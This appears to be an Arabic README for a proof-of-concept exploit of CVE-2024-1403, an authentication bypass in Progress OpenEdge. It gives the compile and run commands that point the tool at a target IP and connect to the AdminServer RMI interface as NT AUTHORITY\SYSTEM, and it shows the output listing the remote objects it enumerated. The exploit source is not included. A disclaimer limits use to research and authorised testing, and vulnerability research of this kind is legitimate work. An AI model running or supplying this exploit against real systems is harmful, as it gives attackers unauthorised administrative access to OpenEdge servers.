
تجاوز المصادقة في Progress OpenEdge
برهان مفهوم لاستغلال Progress OpenEdge CVE-2024-1403.
المزيد من التفاصيل هنا: https://www.horizon3.ai/attack-research/cve-2024-1403-progress-openedge-authentication-bypass-deep-dive
يجب عليك توفير نسخك الخاصة من ملفات JAR التالية:
progress.jaroeauth-12.8.-.jarosmetrics.jarjuniper.jar$ javac -cp progress.jar:oeauth-12.8.0.jar Main.java
سيحاول تشغيل هذا السكربت الاتصال بواجهة AdminServer الخاصة بـ RMI باستخدام بيانات الاعتماد NT AUTHORITY\SYSTEM.
$ java -cp progress.jar:oeauth-12.8.0.jar:osmetrics.jar:juniper.jar:. Main <target_ip>
com.progress.system.SystemPlugIn
com.progress.chimera.common.IChimeraRemoteObject
com.progress.system.ISystemPlugIn
com.progress.agent.database.AgentPlugIn
com.progress.chimera.common.IChimeraRemoteObject
com.progress.agent.database.IAgentPlugIn
com.progress.ubroker.tools.NSRemoteObject
com.progress.chimera.common.IChimeraHierarchy
com.progress.ubroker.tools.IYodaRMI
com.progress.ubroker.tools.IYodaSharedResources
com.progress.ubroker.tools.UBRemoteCommand
com.progress.chimera.common.IChimeraRemoteCommand
com.progress.juniper.admin.JAPlugIn
com.progress.chimera.common.IChimeraRemoteObject
com.progress.juniper.admin.IJAPlugIn
com.progress.agent.smdatabase.SMPlugIn
com.progress.chimera.common.IChimeraRemoteObject
تم إنشاء هذا البرنامج لأغراض البحث الأكاديمي وتطوير تقنيات دفاعية فعالة فقط، وليس الغرض منه استخدامه لمهاجمة الأنظمة إلا في الحالات المصرح بها صراحةً. القائمون على صيانة المشروع غير مسؤولين عن إساءة استخدام البرنامج. استخدمه بمسؤولية.